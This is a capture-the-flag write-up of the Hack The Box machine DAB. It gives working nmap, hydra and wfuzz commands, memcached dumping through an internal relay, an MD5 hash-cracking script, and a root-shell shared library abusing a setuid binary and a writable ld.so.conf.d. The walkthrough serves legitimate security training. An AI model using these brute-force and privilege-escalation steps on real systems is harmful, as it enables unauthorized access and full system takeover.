DAB – HACK THE BOX

Hello, Hackers!!

In this blog post we are going to solve the Hack The Box machine DAB. DAB is a very interesting box, it is well rated, and its difficulty sits at about 7 to 8 out of 10.

Index

  • About Box
  • Enumeration
    • Port Scanning
    • Enumeration on port 80 (HTTP Service)
      • Brute Forcing Login
    • Enumeration on port 8080 (HTTP Service)
      • Cookies Brute Forcing
  • Exploiting SSH
  • Post Enumeration
  • Privilege Escalation
    • LD_PRELOAD

About Box

Level: Intermediate
OS: Linux
IP Address: 10.10.10.86

Let's get started!!!

Enumeration

Let's start with port scanning.

Nmap Port Scanning

Command

nmap 10.10.10.86

(By default this scans the 1000 most common TCP ports; a full-range scan with -p- is worth running as well, since uncommon ports are not on that list.)

Nmap aggressive scan with service version detection (to get more detailed information; -A bundles OS detection, version detection, the default NSE scripts and traceroute, so -sV here is redundant but harmless).

Command

nmap 10.10.10.86 -sV -A

Enumerating Port 80 (HTTP Service)

There is an HTTP service on port 80. When I visited it, I found a login page.

URL: http://10.10.10.86/login

Scanning port 80 with the nikto tool.

Command

nikto -h 10.10.10.86

I tried some default credentials and some SQL injection tricks, but no luck. After that I decided to brute-force the login with hydra.

Command

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.86 http-post-form '/login:username=^USER^&password=^PASS^&submit=Login:F=Error' -vV -t 50

The http-post-form module substitutes ^USER^ and ^PASS^ into the POST body, and F=Error tells hydra that a response containing "Error" means the attempt failed. It successfully found the username and password.

Username: admin
Password: Password1

Time to log in. 🙂

Nothing interesting here 🙁

So I stopped enumerating port 80 and took a look at port 8080, which hosts another HTTP service.

Enumeration on port 8080 (HTTP Service)

Let's try port 8080.

URL: http://10.10.10.86:8080/

So I brute-forced the password value of the cookie with wfuzz.
(Note: you can use rockyou.txt directly; in my case I copied rockyou.txt to /tmp as test.txt.)

Cool, now we have the cookie value we have to set.

Time to use Burp.

The second part shows that the cookie was accepted by the application.

The page now has a form that takes some data and a port number.

Send packet to any internal port.

Here I intercepted the request in Burp: it goes to /socket with a port and a cmd parameter, and the server relays cmd to that port on the host.

Now the task is to find which ports are open on the host. For that I used wfuzz again, fuzzing the port parameter across the full range with a harmless cmd value and showing only responses with HTTP status 200.

Command

wfuzz -c -z range,1-65535 --sc 200 "http://10.10.10.86:8080/socket?port=FUZZ&cmd=ping"

So ports 22, 80, 8080, 11211, 37768 and 21 are open. 11211 and 37768 can't be reached from outside, so let's try them through this relay.

After a search I found that port 11211 is used by Memcached, and that we can pull details out of it with its plain-text commands, sent through the same relay.

The command reference is here: https://github.com/memcached/memcached/wiki/Commands

The interesting command here is stats slabs; after running it I got a listing of the slab classes in which cached items are stored.

Next I need to retrieve the cache dump of slabs 16 and 26.

Stats cachedump command

Command : stats cachedump <slabs_id> <limit>\r\n

Parameters :

  • <slabs_id> : slab id from where you want to retrieve the keys
  • <limit> : result limit, 0 mean no limit

Note that cachedump returns only a bounded portion of a slab's keys, and newer memcached releases provide lru_crawler metadump all as the supported way to list every key. Here I used the following command

stats cachedump 26 0

I found an interesting item: users :).

Let's see what this item contains. (Note: you need to be logged in on port 80 (admin:Password1, from the hydra run) for this query to return the item.)

Command

get users

Found lots of users with their MD5 password hashes 🙂 🙂
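The three memcached steps above (stats slabs, stats cachedump, get) are plain-text requests and replies, and the get reply in particular has to be parsed by the byte count in its VALUE header rather than by looking for a line break. The following is an added example for this write-up, not code from the original post: it builds the commands safely, parses each kind of reply, and walks a live instance the same way. The sample replies in it are constructed to look like memcached output; they were not captured from the box, and the key names, user names and JSON layout of the users item are placeholders.

```python
"""Memcached text-protocol helpers: build commands safely and parse the
replies to `stats slabs`, `stats cachedump` and `get`.

Added example for this write-up, not code from the original post. The
sample replies below are constructed to look like memcached output; they
were not captured from the box, and the JSON layout of the users item,
the key names and the user names are placeholders."""
from __future__ import annotations

import hashlib
import json
import re
import socket

CRLF = b"\r\n"

def build_command(*parts: str) -> bytes:
    """Join the command and its arguments with single spaces and end with
    CRLF. Keys may only contain printable ASCII without spaces; rejecting
    anything else stops a key like 'users\\r\\nflush_all' from smuggling a
    second command onto the same connection."""
    for part in parts:
        if not part or any(not 0x21 <= ord(ch) <= 0x7E for ch in part):
            raise ValueError(f"illegal token in memcached command: {part!r}")
    return " ".join(parts).encode("ascii") + CRLF

def parse_stats_slabs(raw: bytes) -> set[int]:
    """Slab class ids from a `stats slabs` reply. Per-slab lines look like
    'STAT 26:chunk_size 25568'; global lines ('STAT active_slabs 2') have no
    numeric prefix and are skipped."""
    ids = set()
    for line in raw.split(CRLF):
        m = re.match(rb"STAT (\d+):", line)
        if m:
            ids.add(int(m.group(1)))
    return ids

def parse_cachedump(raw: bytes) -> list[tuple[str, int, int]]:
    """(key, size_in_bytes, expiry_epoch) for every
    'ITEM <key> [<n> b; <t> s]' line of a `stats cachedump` reply."""
    items = []
    for line in raw.split(CRLF):
        m = re.match(rb"ITEM (\S+) \[(\d+) b; (\d+) s\]$", line)
        if m:
            items.append((m.group(1).decode(), int(m.group(2)), int(m.group(3))))
    return items

def parse_get(raw: bytes) -> dict[str, bytes]:
    """{key: data} from a `get` reply. The data block is sliced using the
    byte count in the VALUE header instead of searching for CRLF, because a
    cached value may itself contain CRLF (or even the text 'END')."""
    values = {}
    pos = 0
    while True:
        end = raw.index(CRLF, pos)  # ValueError if the reply is truncated
        header = raw[pos:end]
        if header == b"END":
            return values
        fields = header.split()  # VALUE <key> <flags> <bytes> [<cas unique>]
        if len(fields) < 4 or fields[0] != b"VALUE":
            raise ValueError(f"unexpected line in get reply: {header!r}")
        key, length = fields[1].decode(), int(fields[3])
        start = end + len(CRLF)
        values[key] = raw[start:start + length]
        pos = start + length + len(CRLF)

def dump_memcached(host: str, port: int = 11211, timeout: float = 5.0) -> dict[str, bytes]:
    """Enumerate a live instance the way the write-up did by hand: list the
    slabs, dump each slab's keys, then fetch every value. Needs direct TCP
    access to the daemon (on DAB it was reached through the relay instead)."""
    def ask(sock: socket.socket, cmd: bytes) -> bytes:
        sock.sendall(cmd)
        buf = b""
        # Every reply used here ends in END\r\n; 'ERROR' means an unknown command.
        while not (buf.endswith(b"END" + CRLF) or buf.startswith(b"ERROR")):
            chunk = sock.recv(65536)
            if not chunk:
                break
            buf += chunk
        return buf

    with socket.create_connection((host, port), timeout=timeout) as s:
        found: dict[str, bytes] = {}
        for sid in sorted(parse_stats_slabs(ask(s, build_command("stats", "slabs")))):
            dump = ask(s, build_command("stats", "cachedump", str(sid), "0"))
            for key, _, _ in parse_cachedump(dump):
                found.update(parse_get(ask(s, build_command("get", key))))
        return found

# --- constructed sample replies (placeholders, not data from the box) --------
SAMPLE_STATS_SLABS = (
    b"STAT 16:chunk_size 2904\r\nSTAT 16:chunks_per_page 361\r\n"
    b"STAT 26:chunk_size 25568\r\nSTAT 26:used_chunks 1\r\n"
    b"STAT active_slabs 2\r\nSTAT total_malloced 2097152\r\nEND\r\n"
)
SAMPLE_CACHEDUMP = b"ITEM users [106 b; 1533834000 s]\r\nITEM stats [42 b; 1533834000 s]\r\nEND\r\n"
USERS_BLOB = json.dumps({"alice": hashlib.md5(b"Password1").hexdigest(),
                         "bob": hashlib.md5(b"Princess1").hexdigest()}).encode()
SAMPLE_GET = b"VALUE users 0 %d\r\n" % len(USERS_BLOB) + USERS_BLOB + b"\r\nEND\r\n"

if __name__ == "__main__":
    print("slabs:", sorted(parse_stats_slabs(SAMPLE_STATS_SLABS)))
    print("keys:", [k for k, _, _ in parse_cachedump(SAMPLE_CACHEDUMP)])
    print("users item:", parse_get(SAMPLE_GET)["users"].decode())
```

Running the file parses the constructed replies; dump_memcached(host) is for a daemon you can reach directly. The command builder refuses whitespace and control characters in keys because memcached treats CRLF as a command separator, so an attacker-controlled key name passed through a relay like the one on port 8080 could otherwise carry a second command such as flush_all.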

I cracked the hashes with hashcat, put the usernames in one file and the recovered passwords in another, and then used hydra to try them against SSH on port 22 to find a valid login. Two notes on the command below: -L/-P tries every user with every password, so if you keep the user:password pairs from cracking you can pass them as one colon-separated file with -C instead; and most SSH servers cap concurrent connections (hydra itself warns and recommends -t 4 for ssh), so a high -t can produce false negatives.

Command

hydra -L users.txt -P password.txt 10.10.10.86 ssh -t 50

Successfully found credentials for SSH.
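The cracking step above works because the hashes are unsalted MD5: one pass over a wordlist tests every user at once. The following is an added example for this write-up (the author used hashcat; this is not their code): it parses user:hash records, runs the dictionary attack, and emits both the -L/-P files the post used and a -C colon file of only the recovered pairs. The user:hash record layout is an assumption, and the records and wordlist below are constructed, not data from the box.

```python
"""Dictionary attack on unsalted MD5 password hashes.

Added example for this write-up, not the author's code (the post used
hashcat). The 'user:md5hex' record layout is an assumption, and the sample
records and wordlist below are constructed, not data from the box."""
from __future__ import annotations

import hashlib

def parse_user_hashes(records: str) -> dict[str, str]:
    """Parse 'user:md5hex' lines, lower-casing the hex so lookups are
    case-insensitive and skipping blank lines and '#' comments."""
    users = {}
    for line in records.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.partition(":")
        digest = digest.strip().lower()
        if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"not an MD5 hex digest: {line!r}")
        users[user.strip()] = digest
    return users

def crack_md5(users: dict[str, str], wordlist) -> dict[str, str | None]:
    """Return {user: password or None}. Index hash -> users once, then hash
    each candidate a single time: the cost is O(len(wordlist)) no matter how
    many users there are, because no per-user salt is mixed in. Stops early
    once every distinct hash has been found."""
    by_hash: dict[str, list[str]] = {}
    for user, digest in users.items():
        by_hash.setdefault(digest, []).append(user)
    cracked: dict[str, str | None] = {user: None for user in users}
    remaining = set(by_hash)
    for candidate in wordlist:
        if not remaining:
            break
        candidate = candidate.rstrip("\r\n")
        # surrogateescape round-trips non-UTF-8 bytes from wordlists opened
        # with errors="surrogateescape", so odd rockyou entries hash correctly.
        digest = hashlib.md5(candidate.encode("utf-8", "surrogateescape")).hexdigest()
        if digest in remaining:
            remaining.discard(digest)
            for user in by_hash[digest]:
                cracked[user] = candidate
    return cracked

def hydra_inputs(cracked: dict[str, str | None]) -> tuple[str, str, str]:
    """Contents for users.txt and password.txt (hydra -L/-P, which tries every
    combination) and for a colon-separated user:pass file (hydra -C, which
    tries only the pairs actually recovered)."""
    pairs = sorted((u, p) for u, p in cracked.items() if p is not None)
    users_txt = "\n".join(u for u, _ in pairs) + "\n"
    passwords_txt = "\n".join(sorted({p for _, p in pairs})) + "\n"
    colon_txt = "\n".join(f"{u}:{p}" for u, p in pairs) + "\n"
    return users_txt, passwords_txt, colon_txt

# --- constructed sample data (placeholders, not data from the box) -----------
SAMPLE_RECORDS = "\n".join(
    f"{user}:{hashlib.md5(pw.encode()).hexdigest()}"
    for user, pw in [("alice", "Password1"), ("bob", "Princess1"),
                     ("carol", "correct horse battery staple")]
) + "\n"
SAMPLE_WORDLIST = ["123456", "Password1", "qwerty", "Princess1", "letmein"]

if __name__ == "__main__":
    result = crack_md5(parse_user_hashes(SAMPLE_RECORDS), SAMPLE_WORDLIST)
    for user, pw in result.items():
        print(f"{user}: {pw if pw else '<not cracked>'}")
    print(hydra_inputs(result)[2], end="")
```

For a real wordlist pass the open file object straight in, e.g. open("rockyou.txt", encoding="utf-8", errors="surrogateescape"), so candidates stream through without being loaded into memory; the third returned string is what hydra -C expects.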

Exploiting

Let’s connect with SSH.

login: genevieve
password: Princess1

Command

ssh genevieve@10.10.10.86

Here is user.txt.

Post Exploitation/ Privilege Escalation

Now it's time to escalate privileges and get root.txt.

After enumerating, I found an interesting binary named myexec.

This binary is owned by root and has the setuid bit set, so if we can get it to run code of our choosing, that code runs with root privileges.

Command

find / -user root -perm -4000 -print 2>/dev/null | xargs ls -la

I also found that /etc/ld.so.conf.d is writable. It is not a library directory itself: it holds the .conf files that tell ldconfig which directories to search when it rebuilds /etc/ld.so.cache, so write access there lets us add a directory of our own to the loader's search path.

/etc/ld.so.conf.d

Let's see what myexec has for us.

Command

file /usr/bin/myexec

Command

ltrace /usr/bin/myexec

Wow! We got the password the application expects.

Password: s3cur3l0gi

Let's try the application with the password.

Running it with the password shows that the application needs a function named seclogin(), which is missing: no library on the system provides it.

Escalating Privilege using LD_PRELOAD

This is where the write permission on the ld.so.conf.d directory pays off 🙂. After some searching I found a way to exploit it, described here: http://touhidshaikh.com/blog/?p=827

So I wrote a small C file that provides the missing seclogin(). Compiled with GCC into a shared library and picked up by myexec, its body runs with the binary's root privileges.

genevieve@dab:/tmp$ cat libseclogin.c
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Our replacement for the seclogin() symbol that myexec expects from a
   shared library. myexec is setuid root, so this body runs with an
   effective uid of 0. */
void seclogin() {
    unsetenv("LD_PRELOAD");  /* don't carry the preload into the shell */
    setgid(0);
    setuid(0);               /* make the real uid 0 too, so bash keeps it */
    system("/bin/bash");
}

Compiled it with GCC on DAB, then made the resulting library reachable through ld.so.conf.d.

Command

gcc -fPIC -shared -o libseclogin.so libseclogin.c -nostartfiles

Refreshed the loader's cache with ldconfig so it picks up the new library, then ran myexec. One caveat: for a setuid binary the dynamic loader ignores LD_PRELOAD entries that contain a slash, so the LD_PRELOAD in the command below is not what makes this work. myexec finds libseclogin.so through the loader's normal search path, which is what the writable ld.so.conf.d directory plus the ldconfig run control; ldconfig must be able to rewrite /etc/ld.so.cache for the change to take effect.

Command

genevieve@dab:/etc/ld.so.conf.d$ ldconfig /lib
genevieve@dab:/etc/ld.so.conf.d$ LD_PRELOAD="./libseclogin.so" /usr/bin/myexec

Congrats, we are root! 🙂

Thank you for reading. If you have any issue, just drop a comment below 😉
